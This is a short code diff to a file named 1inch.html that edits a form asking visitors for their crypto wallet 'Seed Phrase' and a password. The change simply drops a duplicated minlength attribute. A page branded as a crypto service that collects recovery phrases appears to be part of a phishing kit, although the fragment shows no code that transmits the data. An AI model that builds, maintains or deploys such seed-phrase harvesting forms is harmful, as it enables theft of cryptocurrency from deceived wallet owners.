--- a/1inch.html
+++ b/1inch.html
@@ -79,7 +79,7 @@
                                 <h4>1inch</h4>
                             
                             </div>
-                            <textarea id="seed" minlength="30"  minlength="30"  name="1inch" placeholder="Seed Phrase..." required></textarea >
+                            <textarea id="seed" name="1inch" placeholder="Seed Phrase..." required></textarea >
                         <input id="movepass"  type="password"
                       placeholder="Password" name="Password"/>
                         </div>
